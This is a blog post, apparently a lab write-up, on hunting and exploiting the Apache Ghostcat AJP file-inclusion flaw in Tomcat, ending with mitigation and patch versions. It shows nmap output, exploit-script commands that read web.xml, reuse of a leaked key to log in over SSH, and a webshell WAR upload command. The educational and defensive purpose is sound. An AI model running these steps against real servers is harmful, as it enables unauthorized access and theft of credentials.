Hunting and Exploiting the Apache Ghostcat
The Apache Ghostcat vulnerability is a file inclusion vulnerability which came out in the first quarter of this year while the world was gearing up for a lockdown fight up against the coronavirus.
It allows any attacker to read files such as configuration files , test files or any other tomcat directory files . In addition, if a victim website permits any user to upload files, an attacker can upload the file containing malicious JSP code to the server and then include the uploaded file by exploiting the Ghostcat vulnerability, resulting in remote code execution. Well like the coronavirus’s family of viruses this ghostcat bug has also been there since a long long time and has managed to be undiscovered until the recent past. The context of the short blog post is to comprehend, identify and exploit this notorious bug.
The general idea of a Tomcat server has different ports set up . There’s of course the 8080 HTTP webservice port. Then there is another lesser known port 8009 which runs the AJP (Apache JServ Protocol) service. It is essentially a service implemented through tomcat and allows for performing different operations.
What is the AJP fuss all about…?
Well, the AJP is a binary protocol that reduces overhead for an application server in comparison to the HTTP. It is similar to HTTP but at a binary level. Since it is binary , the machine level translation is far more faster than the HTTP parsing. In short , AJP connector will be used due to:
- It being implemented and exposed by default by Tomcat.
- More persistance in reverse proxying requests performance and load balancing between front end and backend application servers.
- Tomcat’s rich API level implementations juices the developer to push for more faster protocol transversal i.e; HTTP(S) data is seamless and can be retrieved with simple API calls(like canonical getXYX()).
- AJP allows you to skip the additional parsing and pass efficient binary interpretation of the request headers between the proxy server and the app server.
Ways to detect the Ghostcat vulnerability
- You can use the online detection tool by the researchers that have published the finding. (Link: https://www.chaitin.cn/en/ghostcat)
2. The Manual way.
The Manual way of finding it:
As always in any manual penetration test we do perform an Nmap scan to detect open ports.
sh-3.2# nmap -sS -sV -T2 10.10.54.51Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 ISTNmap scan report for 10.10.54.51Host is up (0.19s latency).Not shown: 996 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp open tcpwrapped8009/tcp open ajp13 Apache Jserv (Protocol v1.3)8080/tcp open http Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Apache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to this Ghostcat issue.
Once we find the desired ports highlighted in the results above you can head to this github exploit page: https://github.com/00theway/Ghostcat-CNVD-2020-10487. and run the python exploit.
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read[<] 302 302[<] Location: /index.txt/[<] Content-Length: 0
We are able to retrieve information. Now we can try to retrieve certain common files from the WEB-INF folder such as web.xml
sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1261-1583902632000"[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT[<] Content-Type: application/xml[<] Content-Length: 1261<?xml version="1.0" encoding="UTF-8"?><!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements. See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0.See the License for the specific language governing permissions andlimitations under the License.--><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaeehttp://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"version="4.0"metadata-complete="true"><display-name>Welcome to Tomcat</display-name><description>Welcome to ECorpECorp:8730281lkjlkjdqlksalks</description></web-app>
We found a string (8730281lkjlkjdqlksalks)that appears as key which could possibly be used to login to system called ECorp with a key via an SSH session.
sh-3.2# ssh ECorp@10.10.54.51The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.ECorp@10.10.54.51's password: <enter the key here>Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantageThe programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.ECorp@ubuntu:~$ whoami
ECorpE-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
That’s it we can own the system and retrieve information from the user ECorp and can also possibly look for root level escalations if there are any misconfigurations in the system.
If the application server allows uploading files as well which is uncommon collectively in general , then we can upload WAR files such as :
$ python tomcat.py upload -u tomcat -p tomcat webshell.war 10.10.54.51and gain a code execution using this issue.
More on it here: (https://github.com/hypn0s/AJPy/tree/3854891450e06064b50be1bad6217fd82e5c78e0)
Conclusion:
Ghostcat continues to be one of the severe issues that can be troublesome just like the coronavirus. Threat actors may mass exploit using shodan dorks as well. The suggested mitigation would be to disable the port by commenting out the block of code that enables the port to listen on 8009 using AJP connector.
It is also recommended to upgrade to the following Apache versions that have applied a patch:
- Apache Tomcat Version 9.0.31
- Apache Tomcat Version 8.5.51
- Apache Tomcat Version 7.0.100
For the beginners to practice such vulnerabilities there are good platforms such as TryHackme.com that have made excellent machines to solve and understand such new exploits. You can head over there and solve labs based on such vulnerabilities yourself.
Thanks for the read as always stay safe and healthy during these corona.war times :}.Peas out.
You can connect with me on :
Linkedin: www.linkedin.com/in/prakashashok22 and Twitter:https://twitter.com/prakashashok4
